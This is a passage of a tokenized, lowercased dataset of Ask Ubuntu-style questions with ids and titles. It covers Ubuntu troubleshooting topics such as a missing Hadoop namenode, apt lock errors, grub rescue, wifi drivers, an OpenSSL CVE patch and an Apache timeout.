/configuration > my directory details : hduser @ ratan-inspiron-n5110 : ~/hadoop/hadoop-2.4.0/etc $ cd ./hadoop hduser @ ratan-inspiron-n5110 : ~/hadoop/hadoop-2.4.0/etc/hadoop $ ls capacity-scheduler.xml hadoop-policy.xml mapred-queues.xml.template configuration.xsl hdfs-site.xml mapred-site.xml container-executor.cfg hdfs-site.xml~ mapred-site.xml~ core-site.xml httpfs-env.sh mapred-site.xml.template core-site.xml~ httpfs-log4j.properties slaves hadoop-env.cmd httpfs-signature.secret ssl-client.xml.example hadoop-env.sh httpfs-site.xml ssl-server.xml.example hadoop-env.sh~ log4j.properties yarn-env.cmd hadoop-metrics2.properties mapred-env.cmd yarn-env.sh hadoop-metrics.properties mapred-env.sh yarn-site.xml hduser @ ratan-inspiron-n5110 : ~/hadoop/hadoop-2.4.0/etc/hadoop $ cd .. hduser @ ratan-inspiron-n5110 : ~/hadoop/hadoop-2.4.0/etc $ ls hadoop hduser @ ratan-inspiron-n5110 : ~/hadoop/hadoop-2.4.0/etc $ cd .. hduser @ ratan-inspiron-n5110 : ~/hadoop/hadoop-2.4.0 $ ls bin etc include lib libexec license.txt logs notice.txt readme.txt sbin share hduser @ ratan-inspiron-n5110 : ~/hadoop/hadoop-2.4.0 $ cd ./etc hduser @ ratan-inspiron-n5110 : ~/hadoop/hadoop-2.4.0/etc $ ls hadoop hduser @ ratan-inspiron-n5110 : ~/hadoop/hadoop-2.4.0/etc $ cd .. hduser @ ratan-inspiron-n5110 : ~/hadoop/hadoop-2.4.0 $ cd ./sbin hduser @ ratan-inspiron-n5110 : ~/hadoop/hadoop-2.4.0/sbin $ ls distribute-exclude.sh hdfs-config.sh slaves.sh start-dfs.cmd start-yarn.sh stop-dfs.cmd stop-yarn.sh hadoop-daemon.sh httpfs.sh start-all.cmd start-dfs.sh stop-all.cmd stop-dfs.sh yarn-daemon.sh hadoop-daemons.sh mr-jobhistory-daemon.sh start-all.sh start-secure-dns.sh stop-all.sh stop-secure-dns.sh yarn-daemons.sh hdfs-config.cmd refresh-namenodes.sh start-balancer.sh start-yarn.cmd stop-balancer.sh stop-yarn.cmd when i start the daemons : hduser @ ratan-inspiron-n5110 : ~/hadoop/hadoop-2.4.0/sbin $ ls distribute-exclude.sh start-all.cmd stop-all.sh hadoop-daemon.sh start-all.sh stop-balancer.sh hadoop-daemons.sh start-balancer.sh stop-dfs.cmd hdfs-config.cmd start-dfs.cmd stop-dfs.sh hdfs-config.sh start-dfs.sh stop-secure-dns.sh httpfs.sh start-secure-dns.sh stop-yarn.cmd mr-jobhistory-daemon.sh start-yarn.cmd stop-yarn.sh refresh-namenodes.sh start-yarn.sh yarn-daemon.sh slaves.sh stop-all.cmd yarn-daemons.sh hduser @ ratan-inspiron-n5110 : ~/hadoop/hadoop-2.4.0/sbin $ ./start-all.sh this script is deprecated . instead use start-dfs.sh and start-yarn.sh starting namenodes on [ localhost ] localhost : starting namenode , logging to /home/hduser/hadoop/hadoop-2.4.0/logs/hadoop-hduser-namenode-ratan-inspiron-n5110.out localhost : starting datanode , logging to /home/hduser/hadoop/hadoop-2.4.0/logs/hadoop-hduser-datanode-ratan-inspiron-n5110.out starting secondary namenodes [ 0.0.0.0 ] 0.0.0.0 : starting secondarynamenode , logging to /home/hduser/hadoop/hadoop-2.4.0/logs/hadoop-hduser-secondarynamenode-ratan-inspiron-n5110.out starting yarn daemons starting resourcemanager , logging to /home/hduser/hadoop/hadoop-2.4.0/logs/yarn-hduser-resourcemanager-ratan-inspiron-n5110.out localhost : starting nodemanager , logging to /home/hduser/hadoop/hadoop-2.4.0/logs/yarn-hduser-nodemanager-ratan-inspiron-n5110.out hduser @ ratan-inspiron-n5110 : ~/hadoop/hadoop-2.4.0/sbin $ jps 1441 datanode 1608 secondarynamenode 1912 nodemanager 2448 jps 1775 resourcemanager hduser @ ratan-inspiron-n5110 : ~/hadoop/hadoop-2.4.0/sbin $ the problem is i can not find the namenode that has to be formatted . and when i run the daemons , the namenode is nowhere to be seen . where am i going wrong ?
477953	what does it mean it ca n't access this file ?	user @ chrubuntu : ~ $ sudo apt-get update [ sudo ] password for user : user sorry , try again . [ sudo ] password for user : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? user @ chrubuntu : ~ $ sudo apt-get -f install e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? user @ chrubuntu : ~ $ i 'm trying to install wine1.6 and i 'm using the terminal . when i try to do it otherwise , it says that there are packages that are missing or uninstallable , what does that mean ? am i not able to download wine ?
477961	how to know who accessing my computer via ssh command remote in ubuntu ?	somebody accessing my computer with my password , i want to know who login my system via ssh xxxx @ 192.168.8.345 , i want to know that ip how to trace it .
477963	why does n't the command finish	i have added this to .bashrc alias a='ap update & & ap dist-upgrade -y & & do-release-upgrade -d & & ap check & & ap autoremove -y & & ap autoclean' so i can run the long command just by entering a but the command stops after do-release-upgrade -d and when i remove it from the alias and run a again the command works . alias ap='apt-get'
477970	how to fix dual boot with partition located more than 100 gig away from disk start	am having a problem repair grub to dual boot on my system my laptop came with original windows 8 , thus an efi system . u successfully installed ubuntu 13.04 on it , located on a seperate partition ( 30 gig ) at the end of my hard disk which is 1tb . i also succeded in doin a boot repair so as to enable me to dual boot with my windows 8. which was successful . as time went on my hard dis filled and i decided it was time to upgrade . i created a 100 gig partition , one i sliced from the 400 gig windows partition , cos i was gradually transitioning into ubuntu . i successfully installed ubuntu 14.04 on it but this time the boot repair doesnt seem to work . and any time i try to do a repair it gives me this error message an error occurred during the repair . please write on a paper the following url : http : //paste.ubuntu.com/7599074/ in case you still experience boot problem , indicate this url to : boot.repair @ gmail.com you can now reboot your computer . the boot files of [ the os now in use - ubuntu 14.04 lts ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot partition : ] option of [ boot repair ] . ( https : //help.ubuntu.com/community/bootpartition ) please help me fix cos there i some programes in need to run in windows for school
477974	how to remove unnecessary locales	i noticed i have several unneeded locales installed.i only need one locale . how to remove all the rest ? the locales are for example firefox-locale- ?
477978	integrated webcam isnt working at all ubuntu 14.04 x64	i 've recently installed ubuntu 14.04 lts x64 and cheese is n't working also skype they 're recognizing the camera but it shows an error on playing from it i tried solutions here , here and here and also no one worked for me i have the file /dev/video0 and i tried sudo chmod 777 /dev/video* and vlc v4l2 : ////dev//video0 but that 's didnt work neither , also i tried to install guvcview but also didnt work the output of dmesg is here , and the output of lsusb is here and also it was working at initial install any thoughts please ?
477980	unable to mount htc one	i 'm currently on ubuntu 14.04 on my vaio pro 13 it has intel i5 haswell . both of my usb ports are 3.0 . when i plug in my htc one it gives error 'could n't find matching udev device . ' i did a lot of googling but none of the guide with mtp-tools helped
477983	how to solve unmet dependencies ?	i am using ubuntu 12.04 . i am trying to install vim editor . when i run sudo apt-get install vim command then i got error like follow : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-headers-generic-lts-raring : depends : linux-headers-3.8.0-38-generic but it is not going to be installed vim : depends : vim-runtime ( = 2:7.3.429-2ubuntu2.1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . how do i solve this error ?
477984	ho to remove rtl8192cu-tjp-dkms	i have a problem with this driver rtl8192cu-tjp-dkms it does not work . i would like to remove it , not fix it , remove . i 'd be grateful to anyone providing help . thank you .
477985	lightdm crashes for domain users in ubuntu 14.04	can someone please help . i am using ubunto 14.04 . i have installed power broker ( likewise open ) . it allows login for domain users from shell prompt . but when i try to login from login page . it throws me out . in /var/log/auth.log i can see domain user logging in and immediately logging out . can any one please help . i do n't have internet connection in my ubuntu machine . thanks ashima
477987	two python distributions , sudo picking the wrong one	i 'm back to linux after an over 10 year abstinence ( fool me thinks ) . and a little rusty in the sys admin department . i 'm faced with an issue with my python distribution . i 'm using python 2.7 , but based on the anaconda flavour . i followed the standard guidance but recently i discovered an issue that i 'm not sure how to fix . under sudo , the standard python as comes with ubuntu is provided . under my user account python points to the anaconda version : dhk @ localhost : ~/home/ $ which python /opt/anaconda/bin/python dhk @ localhost : ~/home/ $ sudo which python /usr/bin/python this is an issue as using sudo pip [ anything ] usually acts on the wrong directory , yet i can not use it without sudo .
477989	`` can not open file userpref.blend @ for writing : permission denied '' in blender	i 'm using blender 2.69 , installed via software centre , and when i save my user preference through file - > user preferences and click on `` save user settings '' there is a message '' can not open file /home/ganez/.config/blender/2.69/config/userpref.blend @ for writing permission denied '' i have checked to the path /home/ganez/.config/blender/2.69/config/ and there is no userpref.blend file present . ps : i think this has something to do with file permission for that config folder and i have no idea on how to use the chmod command . so any advise ? thank you in advance .
477990	java still dont recognize horizontal scroll ( right click ) 14.04	i am totally trackpoint fan , i use it all the time and have disablet my touchpad . due to my study i work a lot with matlab , but matlab uses java , and horizontal scroll does not be recognized by java as i already reat in many other threats ( well it recognizes as right click : s ) . there seems to be no solution for that and disable horizontal scroll in matlab is no solution for me at all . does anybody know about a fix for that or somehow to enable horizontal scroll java . this really drives me crazy . help ! i have ubuntu 14.04 with java version : java version `` 1.7.0_55 '' openjdk runtime environment ( icedtea 2.4.7 ) ( 7u55-2.4.7-1ubuntu1 ) openjdk 64-bit server vm ( build 24.51-b03 , mixed mode ) thank you in advance !
477998	after upgrading to trusty , alsa midi connection ( aconnect ) does n't seem to work right	previously in kubuntu 13.10 i was able to open vmpk or plug in a midi keyboard , and provided that timidity was running in server mode , i could run aconnect [ keyboard port ( 129:0 for vmpk ) ] 14:0 aconnect 14:0 128:0 and i could play the keyboard and get sound . but now , a while after upgrading to trusty , i tried to do that , and did n't get any sound . timidity itself ( timidity ~/path/to/midi.mid ) still plays files fine , but if i try to play them with aplaymidi , i still just get silence . oddly , the midi files are clearly being read . when i ran ( where 130:0 was vmpk 's input port ) aplaymidi -p 130:0 ~/path/to/midi.mid vmpk was highlighting notes on the piano as if it were playing the midi . one time i tried this , timidity ( ? ) very briefly played a fraction of a second of the first chord of my song before everything went silent and vmpk just highlighted the first voice on the keyboard as usual . now the weirdest part of this is that probably about 40 % of the time , when i 've played at least one note with either aplaymidi or vmpk , when i run aconnect -x i get a sudden burst of a note or chord from my speakers ( that is , if i played one note , i get a note ; if i played multiple sequential notes , they turn into a chord ) , as if the notes were being queued up but not being played and that somehow liberated them . i have no idea what 's going on there . a little while ago i remember having a problem with audacity playing wav files sped up and also locking up if i tried to pause it , which it stopped doing when i set the audio devices to the actual audio devices rather than pulse . but now when i checked again , it 's doing the opposite : it wo n't play audio at all and/or acts weirdly if i do n't set the audio devices to pulse , and either way will very occasionally randomly do the speeding up thing regardless . oddly in the midst of what 's looking like a pretty screwed up sound system , sound in vlc and firefox has been working fine and if i play a wav file with aplay ~/path/to/sound.wav that works fine too . any idea what i could do to figure out what 's wrong with alsa and/or fix it ? edit : i tried aseqdump . all i got from both vmpk and aplaymidi were a bunch of lines that looked like these ; just `` note on '' , `` note off '' , `` port subscribed '' when i connected to aseqdump , and `` port unsubscribed '' if i ran aconnect -x in the other tab or the song finished . source event ch data 0:1 port subscribed 132:0 - > 131:0 132:0 program change 0 , program 34 132:0 note on 9 , note 35 , velocity 40 132:0 program change 1 , program 40 132:0 program change 2 , program 44 ... 132:0 note on 9 , note 35 , velocity 40 132:0 note off 9 , note 35 , velocity 0 132:0 note on 0 , note 48 , velocity 95 132:0 note on 9 , note 35 , velocity 40 132:0 note on 1 , note 72 , velocity 65 132:0 note off 0 , note 48 , velocity 0 132:0 note off 1 , note 72 , velocity 0 132:0 note off 9 , note 35 , velocity 0 132:0 note on 0 , note 46 , velocity 80 132:0 note on 9 , note 35 , velocity 40 132:0 note on 1 , note 70 , velocity 65 132:0 note off 0 , note 46 , velocity 0 132:0 note off 1 , note 70 , velocity 0 132:0 note off 9 , note 35 , velocity 0 132:0 note on 0 , note 48 , velocity 105 132:0 note on 9 , note 35 , velocity 40 132:0 note on 1 , note 72 , velocity 75 132:0 note off 0 , note 48 , velocity 0 132:0 note off 1 , note 72 , velocity 0 132:0 note off 9 , note 35 , velocity 0 132:0 note on 9 , note 35 , velocity 40 132:0 note on 0 , note 43 , velocity 80 132:0 note on 1 , note 67 , velocity 50 0:1 port unsubscribed 132:0 - > 131:0 it seems like the burst of sound specifically only occurs when i have vmpk or aplaymidi connected to timidity and then either close aplaymidi with ctrl+c or disconnect vmpk with aconnect -x . also , when i try to use fluidsynth , fluidsynth and jackd will both fail if i try to run them because jackd ca n't access some device named alsa_pcm . $ jackd -d alsa -r jackdmp 1.9.10 copyright 2001-2005 paul davis and others . copyright 2004-2013 grame . jackdmp comes with absolutely no warranty this is free software , and you are welcome to redistribute it under certain conditions ; see the file copying for details no message buffer overruns no message buffer overruns no message buffer overruns jack server starting in realtime mode with priority 10 can not lock down 82274202 byte memory area ( can not allocate memory ) audio_reservation_init acquire audio card audio0 creating alsa driver ... hw:0|hw:0|1024|2|48000|0|0|nomon|swmeter|-|32bit alsa : can not open pcm device alsa_pcm for playback . falling back to capture-only mode can not initialize driver jackserver : :open failed with -1 failed to open server
478000	error : no such device ... grub rescue > _	i am a totally new ubuntu user . i had windows 7 and ubuntu 14.04lts side by side.i have 2 hdd- one 160 gb and 1tb . i decided to delete ubuntu and change to ubuntu 12.04 as 14.04 does not have much softwares.. i opened disk management and deleted two partitions which were unnamed ( so they belonged to ubuntu ) . ( three of the local disks changed to dynamic ) i forgot to proceed to the further steps which said to fix mbr ( i got no idea what it is ) . i restarted the machine and i got this : error : no such device ... ... ... entering rescue mode ... grub rescue > _ i tried to use boot repair and upgrade grub , but boot repair is giving an error and grub update says there is not enough space . i do n't know what to do . please help me .. please ! !
478003	unstable wireless connection on ubuntu only ( router config problem ? )	so i 'm using ubuntu 14.04 and i could connect to all wi-fi 's that i 've tried and it worked fine ... except for this router that i have at home . this connection seems to be unstable , it just randomly disconnects and reconnects . on the same machine i have ubuntu 13.10 ( same problem ) and windows 8 ( no problem ) . also there are no wi-fi problems when i connect with my android phone . so i figured it must be some config issue . i tried tweaking some settings/restoring default on the router but i do n't really know what i 'm doing so , unsurprisingly , it did n't fix the problem .
478004	ubuntu 14.04 failed to get session bus : the connection is closed	my lockscreen was not working , so after reading some solutions here i tried to install sudo apt-get install gnome-screensaver i found it already installed then i tried to run gnome-screensaver-command -l and i got the following message - ** message : failed to get session bus : the connection is closed what should i do i already tried sudo service dbus restart which did not help .
478006	postgresql data diff	note : this question is not about syncing database schema/structure problem in my web application i have a postgresql database server ( pgs ) and a ( separate machine ) business logic server ( bls ) which regularly ( every minute or two ) queries 'select all ' against pgs . the problem is that the 'select all ' query can easily return 50-200 mb each time . it is obvious that it would be not so good architecture-wise to transfer so much data so frequently over the web . possible solution what i would like to do is to run some diff tool on pgs and compare the new query with the previous query ( all this should be done on pgs ) . once the comparison is done i would like to get a dump from pgs and transfer it to bls . i expect that a diff-based dump would be much , much smaller than the whole 'select all ' query . question is there any data diff tool for postgresql that can do diffs that compare postgresql data between 2 tables or 2 dumps ? note : i would prefer some open-source software tool .
478007	ffmpeg permission denied error	i installed ffmpeg into /root/bin i followed this guide : https : //trac.ffmpeg.org/wiki/compilationguide/ubuntu i now want a non admin to access it . i created a symbolic link in /usr/local/bin now if i try to execute i get : -bash : /usr/local/bin/ffmpeg : permission denied
478013	always show battery icon option not there in ubuntu gnome	i am using ubuntu gnome 14.04 . the battery icon is visible only when the battery is discharging . in previous versions ( ubuntu 12.04 with gnome added ) , i was able to configure this to show the battery percentage all the time . however , in this current version , in power settings , there is no such option . what should i do t show the battery icon always in the top panel ... ?
478014	new nvidia graphics card drivers	hi i am writing this as i have an issue with my nvidia drivers . i have a nvidia 750ti running on a xubuntu 14.04 lts . i have had problems with my nvidia drivers before and solved them using this answer : unable toboot with nvidia gtx 750 ti , even with latest beta drivers after installing the drivers the graphics card have been working perfectly , until the kernel upgraded . after that i would again have driver problems and then would install the newest drivers again . so here are my questions : do i have to install the drivers from the nvidia website manually every time there is a kernel upgrade ? i saw that there are experimental drivers for the new graphics cards : https : //launchpad.net/~xorg-edgers/+archive/ppa . i have heard that they experimental and could potentially damage your system , but they do have the newest nvidia 337.25 drivers . are these safe to use and do they update automatically ( sudo apt-get upgrade or gui method ) ? which of the two options would be better ? thank you for your help
478018	ralink rt3090 in ubuntu 14.04 -- very bad reception + keeps disconnecting	i 've upgraded from 12.04 ( actually mint 13 ) to 14.04 ( actually mint 17 ) ( 64bit ) , and my wifi reception with my ralink rt3090 is now very bad . i only get good connectivity if i 'm in the same room as my wifi router , whereas previously or in windows 7 i could connect to the router from a significantly larger distance . also , the nm-applet now shows only 2 networks tops ( the strongest ones ) , whereas previously i 'd get a very long list . since the wifi still works well in windows 7 , this should n't be a hardware issue . what can i do to fix this ?
478028	kernel update ( 64 ) will not boot . how can i automatically boot with earlier version ? u12.04lts	ubuntu 12.04lts after an automatic kernel update through update-manager i can not boot up without intervention any more . latest version which grub boots automatically is 3.2.0-64-generic-pae which fails during startup at a blank screen . [ 2.140928 ] kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) [ 2.141024 ] pid : 1 , comm ; swapper/0 not tainted 3.2.0-64-generic-pae # 97 ubuntu followed by a call trace , found at the end of the bootup in recovery mode . it is not a disk error as i bootup properly with both 63 and 29 . may be the same as i want to recover my data on ubuntu but maybe not . others get the same message for unrelated ( ? ) problems . another post has a reply which suggests it might be the boot cd - my cd has simcity in it - a wine project i am working on - getting it working ! ! i am obliged to use 3.2.0-63-generic-pae in order to bootup properly . how can i remove 64 and automatically bootup 63 ? i presume i have to edit a grub script but which and where is it ? if i physically remove 64 ( how ? which of the two shown below ? do i need to make a new `` generic '' image ? ) will i then be deprived of future kernel updates which depend upon 64 ? harveyp @ harveyp : ~ $ sudo dpkg -l | grep linux-image [ sudo ] password for harveyp : ii linux-image-3.2.0-29-generic-pae 3.2.0-29.46 linux kernel image for version 3.2.0 on 32 bit x86 smp ii linux-image-3.2.0-63-generic-pae 3.2.0-63.95 linux kernel image for version 3.2.0 on 32 bit x86 smp ii linux-image-3.2.0-64-generic-pae 3.2.0-64.97 linux kernel image for version 3.2.0 on 32 bit x86 smp ii linux-image-generic-pae 3.2.0.64.76 generic linux kernel image which kernel version to use ... has a reply which suggests ... sudo apt-get purge linux-image-x linux-headers-x where x is the version that is giving you issues but here too i am unsure what to do about the `` generic '' image as i have a pae 64 and a generic 64 . and i do n't wish to break it any more than it is already ... thank you for your help .
478029	adding mimetypes in ubuntu 14.04	ok , so here 's what i want to do : i have a file with a specific extension ( *.ipynb ) that i want to connect with a specific program . ubuntu however thinks it is a text/plain file . there are a lot of questions about this topic here on askubuntu , but non of them worked . i also tried to follow the instructions that are given here : https : //help.ubuntu.com/community/addingmimetypes - did not work . since this is definitely a problem a lot of users experience , can anyone post an answer that explains how to do this ?
478034	ubuntu 14.04 emacs installation problem	i have emacs 24 installed , and trying to obtain package from melpa , but the archive wo n't download . i am running ubuntu in virtual box 4.3 on windows 8 . i then returned to my old standby vim 7.4 , there is also a problem with plugins not loading , i use pathogen to manage my plugins . i have mint 16 running on another disk and opensuse 13.1 in virtual box , no problems ! whats happening with ubuntu ?
478036	ubuntu wo n't connect to network through ethernet	i have just built a desktop computer and i have created a live usb with ubuntu 14.04 . i boot to the usb to `` try ubuntu '' and everything works fine , but the computer refuses to connect to the network through ethernet . i do n't have any other alternatives such as wifi . and when i connect the same ethernet cable to my laptop , it connects successfully . the thing is that the network card is on my motherboard and it is recognized by the system . the kernel modules are loaded and i tried to reload them . ( as you will see below ) here is some info : ~ $ lspci -nnk | grep -ia2 net 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : gigabyte technology co. , ltd motherboard [ 1458 : e000 ] kernel driver in use : r8169 so the kernel driver is : r8169 . i reload it with : ~ $ sudo modprobe -r r8169 ~ $ sudo modprobe r8169 but with no results ... still , no connection ... i also tried with ethtool : ~ $ ethtool eth0 and i got : [ ... ] speed : 100mb/s duplex : full port : mii phyad : 0 transeiver : internal auto-negotiation : on can not get wake-on-lan settings : operation not permitted current message level : 0x00000033 ( 51 ) drv probe ifdown ifup link detected : yes [ ... ] when i try to ping my routers address , it says `` network unreachable '' . i have n't changed anything in the network connection settings . it is a live usb , so everything is on the default preference . however , the system obviously recognizes the card , which is on my motherboard , and not an external one . what else should i try to solve my problem ? did anyone face anything similar ? thanks in advance .
478037	installing ubuntu touch in a samsung galaxy tab 2 10.1 gt-p5100	i have a samsung galaxy tab 2 10.1 gt-p5100 ( i know you all would have probably known which one i have with a shorter name but i want to make sure i get for my specific one ) and i really want to install ubuntu touch on it since ubuntu is my favorite os now going mobile . i have tried a tutorial once ( i ca n't remember which one ) but it did not work and my tablet was bricked , so i had to reinstall my old rom . could some one me by either giving me a step by step tutorial or referring me to one that they know works .
478038	networkmanager infinite connexion and false report `` out of range ''	networkmanager tries to connect to my wifi ad infinitum and network settings falsely reports it out of range . have tried manually ( wpa_passphrase , wpa_supplicant , dhclient wlan0 etc . ) but to no end . this has not been a problem until updates a few days ago . my poe [ using wireless ] however , seems to work . any ideas ? ( ubuntu 14.04 )
478040	unity partially broken after installing gnome	i recently installed gnome on ubuntu 14.04 lts , but this appears to have damaged unity such that i ca n't change the wallpaper in unity , nor will the context menu appear when i right-click the desktop . the launcher and everything else appears to work correctly , however . so what 's the deal with my unity desktop ?
478042	how to patch the vulnerability [ cve-2014-0224 ] in openssl ?	i 've received a warning from the authority that generated my certificate , it says that there is bug in openssl and it has been found affecting versions 1.0.1 . as i understand , i have to upgrade to 1.0.1h to fix this bug . this is the first time i deal with these stuff and i 'm worried about how it will affect my server . do i have to restart any services ? and what exactly ? i have to make sure this is not going to take too long .
478047	not seeing plymouth graphical boot-up screen until end of boot process	after reverting back from burg to gnu grub2 , i noticed that the purple plymouth loading screen was n't appearing until the very end of the boot-up process , when it flashed up for about a second . before this , the purple screen loaded with the ubuntu logo and the dots at the bottom changing colour one by one . now , after selecting ubuntu on the grub2 menu , i see a black screen for a long time ( probably while ubuntu is booting in the background ) , and then the purple screen shows up for a second and the dots change colour all at once . then , it takes me to the log-in screen . this is really bugging me , and i 'd be grateful if anyone could help . thanks ! srayan . ubuntu 14.04 lts dual-booted alongside windows 7 toshiba satellite c660-2el
478048	why do i always get this error when using 'apt-get ' commands ?	i am using ubuntu 14.04 ( with unity ) . just today ( as of the date of this post ) i did a sudo apt-get update & & sudo apt-get upgrade and at the end of the 'upgrade ' process i got the following error : - setting up crossplatformui ( 1.0.38 ) ... * stopping acpi services ... [ ok ] * starting acpi services ... [ ok ] package libqtgui4 exist qt_version = 4 make -c /lib/modules/3.13.0-27-generic/build m=/usr/local/bin/ztemtapp/zteusbserial/below2.6.27 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-27-generic' cc [ m ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.o /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:34:28 : fatal error : linux/smp_lock.h : no such file or directory # include < linux/smp_lock.h > ^ compilation terminated . make [ 2 ] : *** [ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.o ] error 1 make [ 1 ] : *** [ _module_/usr/local/bin/ztemtapp/zteusbserial/below2.6.27 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-27-generic' make : *** [ modules ] error 2 dpkg : error processing package crossplatformui ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : crossplatformui e : sub-process /usr/bin/dpkg returned an error code ( 1 ) from then on whatever apt-get command i use ( so far as i know , except apt-get update ) i keep getting the above error at the end of the process . but whichever apt-get command i use does what it has to without fail . ( for example i tried installing blender with sudo apt-get install blender and it installed fine though it showed the above error . ) after this i even got a kernel update ( from 3.13.0-27 to 3.13.0-29 via the software updater ) , but even now the issue persists . how do i solve this issue ?
478049	running tweeteye program in wine	i have downloaded a windows version ( not the newest ) of tweeteye to be run in wine . it is dependent on java . i have therefore downloaded java . whereas the newest version of tweeteye has no problems , the next newest can not find java , no matter how many time i download java . i must use the next newest because there is a problem with the newest and accessing a specific website that i need to access . all these programs have located themselves here : /home/mugen/.wine/drive_c/program files ( x86 )
478050	apache timeout ( problem loading page ) on localhost	i am running a php script locally in my firefox web browser . after exactly 300 seconds i get an error page . `` problem loading page . the connection has timed out . the server at localhost is taking too long to respond . '' the script is still running , but it seems extremely slow to me . assumption : the apache timeout is the cause for the error page ( as it is set to 300 ) . but i do not understand why this is happening . it is not the first time that i am running a php script that is taking a long time . sometimes my scripts run for a few days . this particular script is reading publication data from an innodb table ( 350k records ) and splitting the authors by semicolon . these author names are then written back into another table . simply increasing the timeout is not the solution here . i need to fix whatever is causing the timeout . no doubt it is also the reason why my script is running so slow . i have found the reason for the slow inserts : as i am using innodb , i should have wrapped my inserts in a transaction/commit . and a possible reason for the timeout : specifying 127.0.0.1 in unix will use tcp/ip instead of a unix socket . on http : //httpd.apache.org/docs/2.2/mod/core.html # timeout i can read that `` the timeout directive defines the length of time apache will wait for i/o in various circumstances : when reading data from the client , the length of time to wait for a tcp packet to arrive if the read buffer is empty . when writing data to the client , the length of time to wait for an acknowledgement of a packet if the send buffer is full . [ ... ] '' . i would be very grateful for any kind of help , such as instructions to look at a certain log file or to run a certain command to get more info . as far as i know , the apache timeout deals with internet traffic , but i 'm not connecting to anything , so ... well , i 'm lost . google is no help either . some environment information : php 5.3.10-1ubuntu3.11 with suhosin-patch ( cli ) ( built : apr 4 2014 01:30:04 ) mysql ver 14.14 distrib 5.5.37 , for debian-linux-gnu ( x86_64 ) using readline 6.2 ubuntu 12.04.4 lts , 3.5.0-51-generic fritz ! box fon wlan 7360 , fritz ! os 06.04 lan 2 at 100 mbit/s ( green mode , instead of 1 gbit/s power mode ) i am using 12.0 gib of 125.9 gib memory . no swap . load average of around 2.3 . and still 1.9 tib available disk space . what i have tried so far : '' work offline '' in my browser go to 127.0.0.1 instead of localhost in httpd.conf i changed servername localhost to 127.0.0.1:80 in the php script first retrieve all data , close the resultset and then work from an array . whenever i made changes to a config file , i restarted apache2 and mysql . the php script : set_time_limit ( 0 ) ; ini_set ( 'display_errors ' , 1 ) ; ini_set ( 'memory_limit ' , '4g ' ) ; error_reporting ( e_all|e_strict ) ; $ mysqli = new mysqli ( 'localhost ' , 'root ' , 'mypassword ' , 'wos_mexico_1990-2014 ' ) ; if ( $ mysqli ) { $ sql = 'select `id` , `au` , `af` , `c1` , `rp` , `em` , `ri` , `oi` from `wos` ; ' ; if ( $ result = $ mysqli- > query ( $ sql ) ) { while ( $ row = $ result- > fetch_assoc ( ) ) { // do some things such as explode strings into arrays $ sql = 'insert into ... ' ; $ mysqli- > query ( $ sql ) ; } $ result- > close ( ) ; } $ mysqli- > close ( ) ; } i have skip-name-resolve in my.cnf . in a similar topic , someone posted netstat results , so here are mine . daigu @ jiriki : ~ $ sudo netstat -plnt active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen 7423/mysqld tcp 0 0 127.0.0.1:5939 0.0.0.0 : * listen 2256/teamviewerd tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 2281/dnsmasq tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 1247/cupsd tcp6 0 0 : ::80 : : : * listen 7390/apache2 tcp6 0 0 : :1:631 : : : * listen 1247/cupsd mysqld is on tcp while apache2 is on tcp6 . is that a problem ? looking in the various log files , i noticed that i am also suffering from ufw spam . jun 7 13:34:29 jiriki kernel : [ 88803.827685 ] [ ufw block ] in=eth1 out= mac=01:00:5e:00:00:01:08:96 : d7 : af:89:26:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 daigu @ jiriki : /var/log $ sudo ufw status verbose status : active logging : on ( low ) default : deny ( incoming ) , allow ( outgoing ) new profiles : skip also the apache2/error.log is quite huge . the last line is : php warning : php startup : unable to load dynamic library '/usr/lib/php5/20090626/http.so ' - /usr/lib/php5/20090626/http.so : can not open shared object file : no such file or directory in unknown on line 0 [ fri jun 06 19:32:12 2014 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.11 with suhosin-patch configured -- resuming normal operations but that seems to be an old problem , popping up first on february 16 . the timeout is not occurring anymore , even though -as far as i know- i have not made any changes to any configuration files . and to answer braiam 's question : there was nothing in the apache logs to indicate that there was a misconfiguration . everything was running just fine , and the php script would in fact continue to run ( as it should ) even though my browser was showing a timeout .
